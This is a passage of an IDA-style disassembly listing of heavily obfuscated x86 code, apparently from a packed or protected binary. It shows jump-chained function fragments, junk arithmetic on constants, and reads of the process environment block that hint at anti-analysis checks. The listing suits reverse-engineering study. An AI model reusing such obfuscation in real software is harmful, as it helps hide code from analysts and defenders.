; END OF FUNCTION CHUNK	FOR sub_43BA66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_43D7EB:				; CODE XREF: sub_43C865+1Aj
		jmp	loc_44F856
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------

loc_43D7F0:				; CODE XREF: y2kk37jd:004410AFj
		xor	edi, 15C8F797h
		add	edi, 492B75C5h
		xchg	edi, [esp]
		jmp	loc_459AA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD49

loc_43D804:				; CODE XREF: sub_43BD49+Bj
					; sub_445226-8D0Aj ...
		mov	esp, ebp
		xchg	eax, [esp-4+arg_0]
		mov	ebp, eax
		pop	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43BD49
; ---------------------------------------------------------------------------

loc_43D80D:				; CODE XREF: y2kk37jd:00441283j
		push	edx
		jmp	loc_459574
; ---------------------------------------------------------------------------

loc_43D813:				; DATA XREF: sub_449641+Eo
		push	ecx
		push	30E6362h
		pop	ecx
		and	ecx, 0BD96A120h
; START	OF FUNCTION CHUNK FOR sub_44AFF6

loc_43D820:				; CODE XREF: sub_44AFF6:loc_43C933j
		jmp	loc_4422A7
; END OF FUNCTION CHUNK	FOR sub_44AFF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455958

loc_43D825:				; CODE XREF: sub_455958-102C6j
		or	ecx, 0BBBA3FD0h
		xor	ecx, 88092C43h
		call	sub_4514BC
; END OF FUNCTION CHUNK	FOR sub_455958
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_43D836:				; CODE XREF: sub_43C851+7E89j
		jle	loc_43B64B
		jnb	loc_447402
		jmp	loc_43EEB0
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D3D0

loc_43D847:				; CODE XREF: sub_44D3D0-5D9Ej
		pop	eax
		or	edx, 99A50310h

loc_43D84E:				; CODE XREF: sub_45689F:loc_4556A4j
		xor	edx, 0FA249F08h
		add	edx, 0EE0749Dh
		rol	edx, 0Ch
		cmp	edx, 9CDD291Dh
		jmp	loc_44242D
; END OF FUNCTION CHUNK	FOR sub_44D3D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_43D868:				; CODE XREF: sub_43BD0D:loc_44CCA5j
		push	0BFA1DA98h
		pop	eax
		rol	eax, 0Eh
		jnb	loc_447552

loc_43D877:				; CODE XREF: y2kk37jd:00448FCEj
		jmp	loc_44502F
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EA8

loc_43D87C:				; CODE XREF: sub_446EA8+Dj
		jmp	loc_452175
; END OF FUNCTION CHUNK	FOR sub_446EA8
; ---------------------------------------------------------------------------
		and	edx, 62F59FAAh
		mov	ebx, edi
		jmp	loc_45279D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457B90

loc_43D88E:				; CODE XREF: sub_457B90+Ej
		jnz	loc_45AF0B
		jmp	loc_45B81E
; END OF FUNCTION CHUNK	FOR sub_457B90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BD20

loc_43D899:				; CODE XREF: sub_44BD20:loc_43E192j
		xor	ecx, 0EA04AD7Fh
		add	ecx, 0D1596F93h
		jnz	loc_44B395
		jnp	loc_43D3AD
		jmp	loc_456AA6
; END OF FUNCTION CHUNK	FOR sub_44BD20

; =============== S U B	R O U T	I N E =======================================



sub_43D8B6	proc near		; DATA XREF: sub_442A84+BA76o

; FUNCTION CHUNK AT 0043B378 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043B9DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C7EE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A7E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450E8B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045C418 SIZE 00000014 BYTES

		sub	eax, ds:dword_444AE0
		shr	eax, 11h
		jz	loc_4548C7
		jmp	loc_44A7E5
sub_43D8B6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43D8CA:				; CODE XREF: y2kk37jd:loc_4516E0j
		mov	al, [eax]
		mov	edx, [ebp-20h]
		mov	[edx], al
		inc	dword ptr [ebp-20h]
		jmp	loc_43E959

; =============== S U B	R O U T	I N E =======================================



sub_43D8D9	proc near		; CODE XREF: y2kk37jd:0044D846p
					; y2kk37jd:0044E7AAj
		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_45ADEC
		mov	eax, 26F528F2h
		call	sub_442C3E
		push	offset sub_4530D8
		jmp	nullsub_496
sub_43D8D9	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43D8F6	proc near		; DATA XREF: y2kk37jd:00443EF5o

arg_8		= dword	ptr  0Ch

		push	ecx
		mov	ecx, [esp+4+arg_8]
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_457EF2
		call	sub_44E3B8
sub_43D8F6	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_43D90C:				; CODE XREF: sub_44AC89:loc_454CFDj
		jmp	loc_440A75
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43D911:				; CODE XREF: sub_445226+A985j
		jmp	loc_43E525
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_43D916:				; CODE XREF: y2kk37jd:00440FADj
		jmp	loc_44C462
; ---------------------------------------------------------------------------

loc_43D91B:				; DATA XREF: sub_44BBEA+E55Eo
		add	eax, 0B7EAB30Fh
		call	sub_440337
		push	ebx
		push	offset sub_458852
		jmp	locret_43DED9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_503. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_385. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459789

loc_43D933:				; CODE XREF: sub_459789-125F6j
					; sub_459789:loc_45467Cj
		push	offset sub_448526
		jmp	nullsub_420
; END OF FUNCTION CHUNK	FOR sub_459789
; ---------------------------------------------------------------------------

locret_43D93D:				; CODE XREF: y2kk37jd:0045A67Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504DD

loc_43D93E:				; CODE XREF: sub_4504DD+8610j
					; y2kk37jd:0045B50Aj
		jmp	nullsub_253
; END OF FUNCTION CHUNK	FOR sub_4504DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_43D943:				; CODE XREF: sub_45B7AA-DF91j
		jmp	loc_454D5B
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------

loc_43D948:				; CODE XREF: y2kk37jd:0044CD5Dj
		jmp	loc_44338C
; ---------------------------------------------------------------------------

loc_43D94D:				; CODE XREF: y2kk37jd:0044A9F3j
		jmp	locret_45A7D1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_92. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43D953:				; CODE XREF: y2kk37jd:00449058j
		jmp	loc_4577AF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44966C

loc_43D958:				; CODE XREF: sub_44966C-234Ej
		jge	loc_443683

loc_43D95E:				; CODE XREF: sub_44966C:loc_4472FFj
		add	esi, 263ECE1h
		call	sub_4538AC
; END OF FUNCTION CHUNK	FOR sub_44966C
; START	OF FUNCTION CHUNK FOR sub_45987F

loc_43D969:				; CODE XREF: sub_45987F+5j
		jmp	nullsub_285
; END OF FUNCTION CHUNK	FOR sub_45987F
; ---------------------------------------------------------------------------
		mov	eax, 0A7A44D83h
		call	sub_442C3E
		push	edx
		push	71C6F823h
		jmp	loc_446DF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_43D983:				; CODE XREF: sub_45689F-18D53j
					; y2kk37jd:00459C9Cj
		add	edx, 0D6EF9B32h
		add	edx, ebp
		add	edx, 0D112654Ch
		mov	edx, [edx]
		imul	byte ptr [edx]
		jmp	loc_451657
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_43D99A:				; CODE XREF: sub_4562E5-F1E2j
		jl	loc_45AE78

loc_43D9A0:				; CODE XREF: y2kk37jd:00459D82j
		jmp	loc_44FA1C
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4548FB

loc_43D9A5:				; CODE XREF: sub_4548FB+Ej
		jmp	sub_443BAF
; END OF FUNCTION CHUNK	FOR sub_4548FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AC4B

loc_43D9AA:				; CODE XREF: sub_45AC4B-B46Fj
		jmp	loc_444409
; END OF FUNCTION CHUNK	FOR sub_45AC4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_43D9AF:				; CODE XREF: sub_43C851+B4A2j
		jmp	nullsub_139
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
		sbb	esi, 0AFF78CA9h
		push	0A4450F8Eh
		adc	ebx, eax
		jmp	loc_45AE78
; ---------------------------------------------------------------------------

loc_43D9C6:				; DATA XREF: sub_447F91-93FDo
		call	sub_4487FD
		mov	eax, 0DD5E106Fh
		call	sub_453F01
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_43D9D5:				; CODE XREF: sub_43EF4F:loc_44C5E3j
		jmp	nullsub_68
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B38

loc_43D9DA:				; CODE XREF: sub_445B38+A57Ej
		add	esi, ebx
		jmp	loc_4565B3
; END OF FUNCTION CHUNK	FOR sub_445B38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A783

loc_43D9E1:				; CODE XREF: sub_45A783+6j
		sub	al, 99h
		mov	edx, [ebp-4]
		push	offset sub_445656
		jmp	loc_445A1B
; END OF FUNCTION CHUNK	FOR sub_45A783
; ---------------------------------------------------------------------------
		jnz	loc_4411B8
		jge	loc_45665C
		jmp	sub_455D37
; ---------------------------------------------------------------------------
		db 0Fh,	8Ah, 7Fh
; ---------------------------------------------------------------------------
		push	esi
		add	[eax], eax
		jno	loc_445F0C
		jmp	sub_454E20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_43DA12:				; CODE XREF: sub_4514DE:loc_450AF2j
		add	eax, 0DECED48Bh
		push	edi
		pushf
		push	66BA13E6h
		jmp	loc_43D2F7
; END OF FUNCTION CHUNK	FOR sub_4514DE

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_43DA24	proc near		; DATA XREF: sub_443AA7-2B16o
		jmp	sub_45120B
sub_43DA24	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_43DA29:				; CODE XREF: sub_443AA7:loc_443ABBj
		jns	loc_43FC4E
		mov	eax, large fs:30h
		add	eax, 20h
		call	sub_455299

loc_43DA3E:				; CODE XREF: sub_458A36-16308j
		jmp	loc_43D0EE
; END OF FUNCTION CHUNK	FOR sub_443AA7

; =============== S U B	R O U T	I N E =======================================



sub_43DA43	proc near		; DATA XREF: sub_43FE06+860Eo

; FUNCTION CHUNK AT 0043B36E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EE1A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044A079 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00450363 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045785A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00459BC8 SIZE 00000012 BYTES

		add	eax, 2F169893h
		rol	eax, 1Eh
		xor	eax, 5B4E9C39h

loc_43DA52:				; CODE XREF: sub_43E2EA:loc_4542AAj
		rol	eax, 15h
		sub	eax, 0E90FD0Fh
		rol	eax, 14h
		jmp	loc_43B36E
sub_43DA43	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	edi
		push	0CE6C4AAh
		pop	edi
		xor	edi, 7E5B2BB4h
		add	edi, 8D875A73h
		xchg	edi, [esp]
		jmp	loc_44176E
; ---------------------------------------------------------------------------

locret_43DA7E:				; CODE XREF: y2kk37jd:0045B8F0j
		retn

; =============== S U B	R O U T	I N E =======================================



sub_43DA7F	proc near		; CODE XREF: y2kk37jd:0045056Dj
					; sub_448159:loc_4560CEp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045050D SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	ebx, [esp-4+arg_0]
		mov	edx, ebx
		pop	ebx
		pop	ebp
		jmp	loc_45050D
sub_43DA7F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	esi
		mov	esi, ebp
		jmp	loc_459AF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B03F

loc_43DA97:				; CODE XREF: sub_44B03F+1F8Aj
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_445B67
		jmp	loc_450374
; END OF FUNCTION CHUNK	FOR sub_44B03F
; ---------------------------------------------------------------------------
		and	edx, 7F056921h
		jmp	sub_455A53
; ---------------------------------------------------------------------------

loc_43DAB2:				; DATA XREF: sub_457AE8+Do
		mov	eax, [esp]
		push	ebx
		push	0B920EE6h
		xchg	edi, [esp]
		jmp	loc_451E1B
; ---------------------------------------------------------------------------

loc_43DAC3:				; DATA XREF: sub_443EAB:loc_43BFEAo
		add	eax, [ebp-4]
		push	ecx
		push	83E9AE40h
		pop	ecx
		sub	ecx, 12476A43h
		xor	ecx, 0BFDC3C89h
		cmp	ecx, 0F7245118h
		jmp	loc_455E23
; ---------------------------------------------------------------------------
		shl	edi, 18h
		jmp	sub_441288
; ---------------------------------------------------------------------------

loc_43DAEC:				; CODE XREF: y2kk37jd:loc_442700j
					; y2kk37jd:004461E8j
		adc	edi, ebx
		test	ebx, edx
		jmp	loc_44AD67
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E677

loc_43DAF5:				; CODE XREF: sub_44E677:loc_441F9Cj
		sbb	ebp, ecx
		jmp	loc_44B12B
; END OF FUNCTION CHUNK	FOR sub_44E677
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449734

loc_43DAFC:				; CODE XREF: sub_449734:loc_454F9Fj
		or	edi, 0B3AC3C45h
		add	edi, 4047F377h
		mov	[edi], eax
		pop	edi
		retn
; END OF FUNCTION CHUNK	FOR sub_449734
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2FD

loc_43DB0C:				; CODE XREF: sub_43B2FD+8252j
		push	offset sub_45C097
		jmp	nullsub_46
; END OF FUNCTION CHUNK	FOR sub_43B2FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_43DB16:				; CODE XREF: sub_454D0F:loc_43E509j
		jz	loc_456B1E
; END OF FUNCTION CHUNK	FOR sub_454D0F
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_43DB1C:				; CODE XREF: sub_44C304+E7A1j
		jmp	loc_444040
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
		ror	ebp, 1Bh
		jmp	loc_456B1D
; ---------------------------------------------------------------------------

loc_43DB29:				; DATA XREF: sub_44E9A8-F456o
		xchg	edi, [esp]
		jmp	nullsub_2
; ---------------------------------------------------------------------------
		sub	ebx, 0F828DB46h
		mov	ecx, [eax]
		jmp	sub_446323
; ---------------------------------------------------------------------------

loc_43DB3E:				; CODE XREF: y2kk37jd:0044A760j
		mov	[ecx], edx
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_43DB40:				; CODE XREF: sub_45689F:loc_443755j
		add	edx, 0C180E00h
		or	edx, 4D4E650h
		jnz	loc_43D983

loc_43DB52:				; CODE XREF: sub_44CC31+9E8Aj
		jmp	loc_43BB28
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45447D

loc_43DB57:				; CODE XREF: sub_45447D-33D0j
		jmp	loc_44EF31
; END OF FUNCTION CHUNK	FOR sub_45447D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_43DB5C:				; CODE XREF: sub_43F911+798Aj
		jmp	loc_43DFFE
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_43DB61:				; CODE XREF: sub_4448E2+27B3j
		jmp	sub_43F618
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_43DB66:				; CODE XREF: sub_4577FE:loc_43C5CFj
		or	eax, 0B46EBC1h
		sub	eax, 75353F8Dh
		add	eax, 35897A7Bh
		xchg	eax, [esp-4+arg_0]
		jmp	sub_43F618
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D5A

loc_43DB80:				; CODE XREF: sub_457D5A:loc_4534BDj
		shr	ebp, 6
		jp	loc_4533E2
		jmp	loc_450CEA
; END OF FUNCTION CHUNK	FOR sub_457D5A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_287. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_43DB8F:				; CODE XREF: sub_4440AB+EA3Dj
		jmp	loc_459EDF
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_43DB94:				; CODE XREF: sub_45689F-13EE2j
		jmp	loc_449DEC
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_43DB99:				; CODE XREF: sub_454413-166A8j
		jmp	loc_4595F4
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43DB9E:				; CODE XREF: sub_453867-1816Fj
		jmp	loc_44BC3E
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DD9

loc_43DBA3:				; CODE XREF: sub_458DD9:loc_43D061j
		jz	loc_4530A7
		jmp	loc_45A1C9
; END OF FUNCTION CHUNK	FOR sub_458DD9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_309. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_43DBAF:				; CODE XREF: sub_451A35-11EB2j
		jmp	loc_44D1B5
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------

loc_43DBB4:				; CODE XREF: y2kk37jd:0043C6F4j
		mov	edx, 1F56AC7Bh
		call	sub_440CD1
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_43DBBF:				; CODE XREF: sub_43EF4F+13B12j
		jmp	nullsub_129
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------

loc_43DBC4:				; CODE XREF: y2kk37jd:004450BEj
		push	eax
		mov	eax, ecx
		jmp	loc_457F07
; ---------------------------------------------------------------------------
		push	eax
		call	dword ptr [ebp-4]
		test	eax, eax
		jz	loc_43B9A3
		jmp	loc_449EA8

; =============== S U B	R O U T	I N E =======================================



sub_43DBDD	proc near		; CODE XREF: sub_44493F+12p
					; y2kk37jd:0044B1CDj
		xchg	edx, [esp+0]
		pop	edx
		mov	ds:dword_446BAC, eax
		retn
sub_43DBDD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455556

loc_43DBE8:				; CODE XREF: sub_455556-7A7Aj
		jmp	loc_45B437
; END OF FUNCTION CHUNK	FOR sub_455556
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_43DBED:				; CODE XREF: sub_454539-12770j
					; sub_4465C3+9j
		push	offset loc_45A6A6
		jmp	loc_45636E
; END OF FUNCTION CHUNK	FOR sub_454539
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_43DBF7:				; CODE XREF: sub_44AC89-665Ej
		and	ecx, 0DB096E83h
		mov	esi, 63CF63F5h
		jmp	loc_44E6D9
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455DD8

loc_43DC07:				; CODE XREF: sub_455DD8:loc_456CC1j
		mov	ebp, esp
		jz	sub_44B47E
		push	offset sub_447B79
		jmp	loc_44DB2D
; END OF FUNCTION CHUNK	FOR sub_455DD8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AFC4

loc_43DC19:				; CODE XREF: sub_45AFC4+12j
		sub	edx, 0E5626C66h
		cmp	edx, 173207E5h
		jmp	loc_43D027
; END OF FUNCTION CHUNK	FOR sub_45AFC4
; ---------------------------------------------------------------------------

locret_43DC2A:				; CODE XREF: y2kk37jd:00447792j
		retn
; ---------------------------------------------------------------------------

loc_43DC2B:				; CODE XREF: y2kk37jd:00453E4Dj
		jmp	nullsub_477
; ---------------------------------------------------------------------------

loc_43DC30:				; CODE XREF: y2kk37jd:loc_4505D1j
		add	eax, edx
		call	sub_446AE2
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_43DC37:				; CODE XREF: sub_44AC89-E1BBj
		jmp	loc_45863C
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
		mov	eax, 0F074E076h

loc_43DC41:				; CODE XREF: y2kk37jd:00456B12j
		call	sub_43E0F3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_476. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43DC47:				; CODE XREF: y2kk37jd:0044A94Dj
		jmp	loc_450924
; ---------------------------------------------------------------------------

loc_43DC4C:				; CODE XREF: y2kk37jd:004422B2j
		jmp	loc_45AFFF
; ---------------------------------------------------------------------------
		or	edi, esi
		jmp	sub_4576F6
; ---------------------------------------------------------------------------

loc_43DC58:				; CODE XREF: y2kk37jd:loc_458B27j
		shr	edx, cl
		or	eax, edx
		mov	edx, [ebp-8]
		mov	[edx], al
		mov	eax, [ebp-8]
		mov	al, [eax]
		add	[ebp-0Ah], al
		jmp	loc_455D9E
; ---------------------------------------------------------------------------

loc_43DC6E:				; CODE XREF: y2kk37jd:00459E5Aj
		mov	eax, 2204233Eh

; =============== S U B	R O U T	I N E =======================================



sub_43DC73	proc near		; CODE XREF: sub_43FE26:loc_456003p
		xchg	edx, [esp+0]
		pop	edx
		mov	edx, eax
		call	sub_4581BB
		jmp	loc_43E589
sub_43DC73	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_43DC83:				; CODE XREF: sub_44CDD5+BF0Aj
		jg	loc_44FA44
		jns	loc_44B95F

loc_43DC8F:				; CODE XREF: sub_44CDD5:loc_446911j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44CD37
		jmp	loc_43F23B
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440FC9

loc_43DCA0:				; CODE XREF: sub_440FC9+C00Bj
		not	esi

loc_43DCA2:				; CODE XREF: sub_440FC9:loc_44B1D2j
		push	offset loc_43C350
		jmp	loc_453BF9
; END OF FUNCTION CHUNK	FOR sub_440FC9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43DCAC:				; CODE XREF: sub_445226-59E9j
		add	ecx, 0B023D998h

loc_43DCB2:				; CODE XREF: sub_445226:loc_4496DDj
		push	eax
		lea	eax, dword_457EC0
		push	eax
		push	eax
		mov	edx, eax
		jmp	loc_4577DA
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_43DCC2:				; CODE XREF: y2kk37jd:004476D5j
		mov	edx, ds:dword_457EBC
		jmp	loc_4461FC
; ---------------------------------------------------------------------------

loc_43DCCD:				; DATA XREF: sub_454539+2CAEo
		push	edx
		push	0CB3D933h
		pop	edx
		or	edx, 25A750A8h
		rol	edx, 13h
		jmp	loc_447727
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_43DCE2:				; CODE XREF: sub_4577FE-8DDFj
		or	eax, eax
		jnz	loc_44C971
		jmp	loc_44C328
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_43DCEF:				; CODE XREF: sub_457A46:loc_441523j
		pop	edx
		sub	edx, 570306D2h
		rol	edx, 7
		xor	edx, 58AA85BDh
		add	edx, ebp
		jmp	loc_449088
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_43DD06:				; CODE XREF: sub_44F3F5-D7DDj
		xchg	esi, [esp+4+var_4]
		jmp	loc_43FE46
; END OF FUNCTION CHUNK	FOR sub_44F3F5

; =============== S U B	R O U T	I N E =======================================



sub_43DD0E	proc near		; CODE XREF: sub_453867-14DEBp
					; y2kk37jd:0044F9D1j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E72E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044653D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004481EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004492E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F31B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044F4A3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00455C16 SIZE 00000017 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	1FD78F3Ch
		pop	ecx
		add	ecx, 8DA4C68Bh
		jmp	loc_4492E6
sub_43DD0E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEAB

loc_43DD23:				; CODE XREF: sub_44CEAB+5D28j
		jno	loc_448621

loc_43DD29:				; CODE XREF: sub_44CEAB:loc_44E100j
		xor	edi, ds:4000E9h
		or	edi, ds:4000EDh
		xor	edi, 696BB33Ch
		jmp	loc_44A456
; END OF FUNCTION CHUNK	FOR sub_44CEAB
; ---------------------------------------------------------------------------
		and	esi, 13D963F8h
		mov	ebp, [eax]

loc_43DD48:				; CODE XREF: y2kk37jd:loc_440BB1j
		jmp	sub_448CAE
; ---------------------------------------------------------------------------

loc_43DD4D:				; CODE XREF: y2kk37jd:0044B784j
		and	eax, edx
		jb	loc_4580D3
		add	esi, eax
		mov	edi, esi
; START	OF FUNCTION CHUNK FOR sub_454413

loc_43DD59:				; CODE XREF: sub_454413-8CA0j
		sub	esi, 0F0CFB381h
		add	esi, 0CABFAD6Ch
		xor	esi, 2626057Fh
		jmp	loc_43DB99
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------

loc_43DD70:				; CODE XREF: y2kk37jd:004570DBj
		call	sub_441D1B

loc_43DD75:				; CODE XREF: y2kk37jd:00450524j
		jmp	loc_45528A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_357. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_43DD7B:				; CODE XREF: sub_448CAE-2E5j
		add	eax, ebp
		call	sub_44001E

loc_43DD82:				; CODE XREF: sub_442F42+D67Ej
		jmp	loc_453C34
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448F60

loc_43DD87:				; CODE XREF: sub_448F60-D0ECj
		jmp	loc_456CBB
; END OF FUNCTION CHUNK	FOR sub_448F60
; ---------------------------------------------------------------------------

loc_43DD8C:				; CODE XREF: y2kk37jd:0044C84Cj
		add	eax, 84C09D3Eh
		mov	eax, [eax]
		push	eax
		call	sub_44DB32
		jmp	loc_450659
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_43DD9F:				; CODE XREF: sub_43F75D:loc_44D915j
		push	0
		push	0
		push	10h
		push	0D742F2FEh
		jmp	loc_44B8B5
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_43DDAF:				; CODE XREF: sub_4578A6:loc_453EAFj
		push	30123D98h
		pop	eax
		and	eax, 0C227DB5Ch
		or	eax, ds:4000ECh
		and	eax, ds:4000EFh
		sub	eax, 0E164DDD3h
		add	eax, 0FE39E234h
		jmp	loc_44B051
; END OF FUNCTION CHUNK	FOR sub_4578A6
; ---------------------------------------------------------------------------

loc_43DDD8:				; CODE XREF: y2kk37jd:0043E015j
		jnb	loc_45064E
		pushf
